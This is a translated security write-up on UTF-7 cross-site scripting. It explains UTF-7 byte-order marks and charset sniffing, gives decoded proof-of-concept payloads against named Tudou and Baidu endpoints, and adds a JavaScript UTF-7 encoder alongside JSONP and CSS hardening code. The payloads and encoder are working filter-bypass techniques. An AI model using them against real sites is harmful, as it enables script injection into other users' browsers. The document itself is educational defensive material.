After a day, I finally finished one of the assignments Master (hiphoph4ck) gave me ~
<Thanks to the articles by d4rkwind and 5up3rh3i>
<Thanks to d4rkwind, Master (hiphoph4ck) and 5up3rh3i for their guidance.>
<You are welcome to point out anything in this write-up that is wrong or not rigorous.>
----------------------------------------- UTF-7 XSS Paper -----------------------------------------
****************************************
0x01. What is UTF-7?
****************************************
UTF-7 (7-bit Unicode Transformation Format; UTF is short for Unicode Transformation Format) is a variable-length character encoding
that represents Unicode characters using only ASCII characters, and is intended for environments such as e-mail transmission.
Wiki-URL: http://zh.wikipedia.org/zh-cn/UTF-7
<1> a document can be switched to UTF-7 decoding by declaring the character set, for example @charset "utf-7" in CSS, or a charset declaration in the HTTP header or <meta> tag
<2> it can also be switched to UTF-7 by placing a UTF-7 BOM at the very beginning of the body
Four spellings of the UTF-7 BOM are currently known:
+/v8 | +/v9 | +/v+ | +/v/
(all four are "+" followed by U+FEFF in base64; U+FEFF is 16 bits but a base64 digit carries 6, so the third digit also holds two padding bits (00, 01, 10 or 11), which is where the four spellings come from. Base64 is case-sensitive, so +/V8 is not a BOM.)
****************************************
0x02. Targets
****************************************
What distinguishes UTF-7 from other character sets?
<1> It consists entirely of printable ASCII characters, so a payload slips past the large-scale filters that look for the usual dangerous characters.
<2> It has a BOM, which some other character sets do not; that greatly raises the odds of exploitation, because the attacker's own data can select the encoding.
Targets UTF-7 can attack
<1> HTTP responses whose headers are not set strictly, for example a JSON response served as Content-Type: text/html
<2> responses whose character set is not explicitly declared and is therefore left for the browser to guess
<3> pages where the attacker gets a chance to set the character set through a <meta> tag
Steps of a UTF-7 attack
<1> Make UTF-7 win the character-set selection by whatever means are available, so that the UTF-7 payload gets decoded.
Common methods are:
put the BOM at the start of the body
inject a character-set declaration before the page's own <meta> tag
when a page has no declared character set, compete with the browser's default through its encoding detection
<2> Because of the way UTF-7 encodes text, the vast majority of filters are bypassed; after that, proceed with conventional XSS techniques.
The simplest case is encoding < and >, since most websites do nothing more than escape or filter those two characters.
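As an added example (not part of the original write-up), here is a small UTF-7 encoder/decoder in JavaScript that demonstrates the two properties used above: an encoded payload contains no < or >, and the four BOM spellings listed in 0x01 fall out of the 16-bit/6-bit mismatch. The function names, the sample payload and the demo() helper are this example's own; it assumes BMP input (no surrogate pairs), and its "shift everything" mode reproduces the style of the payloads in 0x03 rather than the minimal encoding RFC 2152 describes.

```javascript
// Added example (not from the original post): a minimal UTF-7 encoder/decoder in
// plain JavaScript. It shows why an encoded payload contains no '<' or '>', where
// the four BOM spellings come from, and why the post's URL puts a %20 between the
// BOM and the data stream. Assumes BMP input only (no surrogate pairs); the
// "shift everything" style matches the post's payloads, not RFC 2152's minimum.

const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Characters RFC 2152 lets an encoder emit unshifted (Set D plus space/CR/LF).
const DIRECT = /[A-Za-z0-9'(),\-.\/:? \r\n]/;

// Base64 of 16-bit code units (UTF-16BE), no '=' padding; leftover bits are zero-filled.
function unitsToBase64(units) {
  let out = "", acc = 0, nbits = 0;
  for (const u of units) {
    acc = (acc << 16) | u;
    nbits += 16;
    while (nbits >= 6) {
      nbits -= 6;
      out += B64[(acc >> nbits) & 63];
    }
    acc &= (1 << nbits) - 1;
  }
  if (nbits > 0) out += B64[(acc << (6 - nbits)) & 63];
  return out;
}

// shiftAll=true wraps the whole string in one "+...-" sequence (the post's style);
// shiftAll=false only shifts characters that are not directly representable.
function encodeUtf7(str, shiftAll = false) {
  let out = "", run = [];
  const flush = () => {
    if (run.length) { out += "+" + unitsToBase64(run) + "-"; run = []; }
  };
  for (const ch of str) {
    if (!shiftAll && ch === "+") { flush(); out += "+-"; }        // literal plus
    else if (!shiftAll && DIRECT.test(ch)) { flush(); out += ch; }
    else run.push(ch.charCodeAt(0));
  }
  flush();
  return out;
}

function decodeUtf7(str) {
  let out = "", i = 0;
  while (i < str.length) {
    if (str[i] !== "+") { out += str[i++]; continue; }
    if (str[i + 1] === "-") { out += "+"; i += 2; continue; }      // "+-" is a literal '+'
    i++;                                                           // enter a shift sequence
    let acc = 0, nbits = 0;
    while (i < str.length && B64.indexOf(str[i]) >= 0) {
      acc = (acc << 6) | B64.indexOf(str[i++]);
      nbits += 6;
      if (nbits >= 16) {
        nbits -= 16;
        out += String.fromCharCode((acc >> nbits) & 0xffff);
        acc &= (1 << nbits) - 1;
      }
    }
    // Fewer than 16 leftover bits are padding and are dropped. A '-' terminator is
    // absorbed; any other terminator (a space, for instance) is ordinary text and kept.
    if (str[i] === "-") i++;
  }
  return out;
}

// U+FEFF needs 16 bits but base64 digits carry 6, so "+/v8" is FEFF plus two padding
// bits. Those two bits become the top of the next code unit if the sequence continues,
// hence the four spellings: +/v8 (00), +/v9 (01), +/v+ (10), +/v/ (11).
function utf7BomVariants() {
  const top12 = unitsToBase64([0xfeff]).slice(0, 2);              // "/v"
  return [0, 1, 2, 3].map(pad => "+" + top12 + B64[((0xfeff & 0xf) << 2) | pad]);
}

// The BOM must end its own shift sequence before the payload starts: in "+/v8+ADw-"
// the second '+' is read as a base64 digit of the BOM's sequence. A space (the %20
// in the post's URL) or a '-' keeps the two sequences apart.
function demo() {
  const payload = "<script>alert(1)</script>";                     // constructed sample
  return {
    shifted: encodeUtf7(payload, true),                            // no '<' or '>' survives
    minimal: encodeUtf7(payload),                                  // +ADw-script+AD4-alert(1)+ADw-/script+AD4-
    boms: utf7BomVariants(),
    separated: decodeUtf7("+/v8 +ADw-"),                           // "\uFEFF <"
    runTogether: decodeUtf7("+/v8+ADw-"),                          // garbage, not "\uFEFF<"
  };
}
```

Run it with node and inspect demo(): shifted is the form the filters in <2> never see a < or > in, and the difference between separated and runTogether is exactly why the Tudou URL in 0x03 carries a %20 between +/v8 and the data stream. Decoding the data streams quoted in 0x03 with decodeUtf7() reproduces the decoded payloads shown there.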
****************************************
0x03. Demos and how to use them
****************************************
Reflected XSS:
[JSON UTF-7 XSS]
<Format> http://xx/...callback=[utf-7 header][utf-7 data stream]...
A Tudou JSON callback dug up by heige
http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-%20xsadas
[utf-7 header] -> %2B%2Fv8 (+/v8)
[utf-7 data stream] -> +ADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-
[after decoding the utf-7 data] -> <htm><body><script>alert(1);</script></body></htm>
(the %20 between the header and the data stream is not decoration: a space ends the BOM's base64 shift sequence, whereas a "+" placed directly after +/v8 would be consumed as the next base64 digit of that same sequence and the payload would not decode)
Stored XSS:
[Baidu custom CSS UTF-7 XSS]
<Format> the CSS body must start with a [utf-7 header]; the [utf-7 data stream] can sit at any position in the body after the header
CSS UTF-7 XSS on heige's blog
http://hitn.bdimg.com/hi_heige/css/item/2792357ee092f60829388a60.css
CSS body content:
--------------------------------------------------------------------
+/v8
#phx {FILTER: Alpha(Opacity=100, FinishOpacity=10, Style=2, StartX=20, StartY=40, FinishX=0, FinishY=0) gray(); WIDTH: 220px; HEIGHT: 32px}
...
body {background: #FFFFFF; font-family: +AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgByAHIAcgA9AD0AMQApAD8AJwAnADoAZQB2AGEAbAAoACcAcgByAHIAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8ASABhAHAAcAB5ACAATgBlAHcAIABZAGUAYQByACEAIAB0AGgAeAAgAG0AYQByAGkAbwAuAC8AKQApADsAJwApACkAOwBmAG8AbgB0AC0AZgBhAG0AaQBsAHkAOgAnA-;}
...
--------------------------------------------------------------------
[utf-7 header] -> +/v8
[utf-7 data stream] -> +AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgByAHIAcgA9AD0AMQApAD8AJwAnADoAZQB2AGEAbAAoACcAcgByAHIAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8ASABhAHAAcAB5ACAATgBlAHcAIABZAGUAYQByACEAIAB0AGgAeAAgAG0AYQByAGkAbwAuAC8AKQApADsAJwApACkAOwBmAG8AbgB0AC0AZgBhAG0AaQBsAHkAOgAnA-
[after decoding the utf-7 data] -> x';xss:expression((window.rrr==1)?'':eval('rrr=1;eval(alert(/Happy New Year! thx mario./));'));font-family:'
****************************************
0x04. Solutions
****************************************
To defend against UTF-7 XSS, it is enough to stop the UTF-7 character set from being recognised.
UTF-7 gets selected mainly in two ways
<1> the character set is declared as utf-7
<2> a UTF-7 BOM sits at the very beginning of the text
Recall what UTF-7 can attack
<1> HTTP responses whose headers are not set strictly, for example JSON served as Content-Type: text/html
<2> responses whose character set is not declared
<3> pages where a <meta> tag gives the attacker a chance to set the character set
Working backwards, the defences are
<1> set the HTTP response headers strictly. For example, JSON must be served as Content-Type: application/json (with an explicit charset), otherwise the callback can be attacked.
<2> declare the character set during development, so that nothing can snatch the priority from it.
If the character set cannot be declared first (as with CSS), insert a space at the beginning of the body, or otherwise break the UTF-7 BOM.
<3> do not let any attacker-controllable content appear before the <meta> charset declaration.
Demo:
<1> stored data should be filtered and sanitised so that a UTF-7 BOM can never appear at its start,
just as Baidu now forces a space into the first position of the custom CSS.
To avoid damaging the data the user wants to express, you can insert a space or
<2> for the attacked JSON endpoint, the fix can be applied in the body
http://apps.hi.baidu.com/dashan/data/status?asyn=1&callback=[utf-7 header][utf-7 data stream]...
In the JSON scenario the header also has to be set: Content-Type: application/json; charset=utf-8
or insert a space or
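The defences above as code, as an added example (not part of the original write-up, and not Tudou's or Baidu's code): the callback-echo pattern this post attacks next to a hardened version that pins Content-Type and charset and whitelists the callback name, plus the "space in the first position" fix for stored text such as custom CSS. Function names, the regexes and the constructed sample inputs are this example's own; the X-Content-Type-Options: nosniff header goes beyond the post and is included because it stops browsers from sniffing a JSON body as HTML.

```javascript
// Added example (not from the original post, and not Tudou's or Baidu's code): the two
// defences from 0x04 as code. buildJsonpWeak() is the callback-echo pattern the post
// attacks; buildJsonpSafe() pins the content type and charset and whitelists the
// callback name; neutralizeUtf7Bom() is the "space in the first position" fix for
// stored text such as custom CSS. The X-Content-Type-Options header is an addition
// beyond the post: it stops browsers from sniffing the JSON body as HTML.

// The four known UTF-7 BOM spellings; they only matter at the very first position.
const UTF7_BOM = /^\+\/v[89+\/]/;

// Weak: callback echoed verbatim, served as text/html with no charset, so the browser
// is free to honour a +/v8 at the start of the body.
function buildJsonpWeak(callback, data) {
  return {
    headers: { "Content-Type": "text/html" },
    body: callback + "(" + JSON.stringify(data) + ")",
  };
}

// Hardened: only a plain (optionally dotted) identifier is accepted as the callback, and
// the response declares both type and charset so nothing in the body can change them.
function buildJsonpSafe(callback, data) {
  if (!/^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(callback)) {
    throw new Error("rejected callback name: " + callback);
  }
  return {
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: callback + "(" + JSON.stringify(data) + ")",
  };
}

function hasUtf7Bom(text) {
  return UTF7_BOM.test(text);
}

// Baidu's fix as the post describes it: force a space into the first position, so the
// BOM is no longer the first thing a charset sniffer sees. Applied unconditionally, so the
// stored body never starts with attacker-chosen bytes.
function neutralizeUtf7Bom(text) {
  return " " + text;
}

// Constructed sample inputs in the shape of the post's payloads (BOM, space, data stream).
const ATTACK_CALLBACK = "+/v8 +ADwAaAB0AG0APgA8AGIAbwBkAHkAPg-";
const ATTACK_CSS = "+/v8\nbody {font-family: +AHgAJwA7-;}";

function demo() {
  let rejected = false;
  try { buildJsonpSafe(ATTACK_CALLBACK, { ok: 1 }); } catch (e) { rejected = true; }
  return {
    weakBodyStartsWithBom: hasUtf7Bom(buildJsonpWeak(ATTACK_CALLBACK, { ok: 1 }).body),
    safeRejectsAttack: rejected,
    safeResponse: buildJsonpSafe("jQuery.cb1", { ok: 1 }),
    cssBefore: hasUtf7Bom(ATTACK_CSS),
    cssAfter: hasUtf7Bom(neutralizeUtf7Bom(ATTACK_CSS)),
  };
}
```

The callback whitelist and the explicit charset are independent layers: the whitelist alone would still leave the charset to the browser's guessing on every other response, and the charset alone still lets an attacker inject arbitrary JavaScript through the callback name, which is why the hardened version does both.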
****************************************
Most people are fairly lazy ~ and do not want to search for themselves
so here are some good references ~
http://openmya.hacker.jp/hasegawa/public/20071107/s6/h6.html?file1_datae.txt (navigate with the left and right arrow keys)
http://openmya.hacker.jp/hasegawa/security/utf7cs.html
http://secdocs.lonerunners.net/documents/details/2056-xss-lightsabre-techniques-using-hackvertor
Tomorrow I have to wrestle with the Noop bird ==~~